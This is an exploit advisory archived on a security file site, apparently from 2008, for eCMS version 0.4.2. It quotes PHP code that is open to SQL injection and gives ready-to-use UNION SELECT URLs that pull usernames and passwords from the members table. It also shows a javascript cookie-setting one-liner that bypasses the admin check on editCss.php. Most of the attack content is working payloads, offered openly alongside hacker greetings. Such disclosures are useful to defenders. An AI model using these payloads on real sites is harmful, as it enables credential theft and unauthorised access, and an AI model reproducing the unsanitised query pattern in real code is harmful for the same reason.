what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ecms-sql.txt

ecms-sql.txt
Posted May 20, 2008
Authored by hadihadi | Site virangar.org

eCMS version 0.4.2 suffers from remote SQL injection and bypass vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | f6ff84c0783097a21f22c7185d59fbc46712386c4cc4ec409e38e35e99d39536

ecms-sql.txt

Change Mirror Download


#######################################################################################
# #
# ...::::eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities ::::... #
#######################################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----
1.sql injection:
-------vuln codes in:-----------
index.php:
line 52:$p = $_GET['p']
..
..
line 55:$query = "SELECT * FROM files WHERE cat = '$p' ORDER BY date DESC";
---
exploit:
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
or
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
#####################
2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ):
-------vuln codes in:-----------
editCss.php:

line 17:if(!isset($_COOKIE['pass']))
{
echo('You\'re not allowed to come here! <a href=admin.php>Go back!</a>');
} else {
....
...
...
-------
/*
if the cookie didn't set for you, you can't allow to see this page..but if we do somethings :) such as :

javascript:document.cookie = "pass=1; path=/";

now the cookie is set for you, and you can allow to see the page and edit the CSS in file "style.css"
*/
exploit:
just open your browser and then type:
javascript:document.cookie = "pass=1; path=/";
now see the "editCss.php" and edit the cms CSS :D
-----
young iranian h4ck3rz





Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close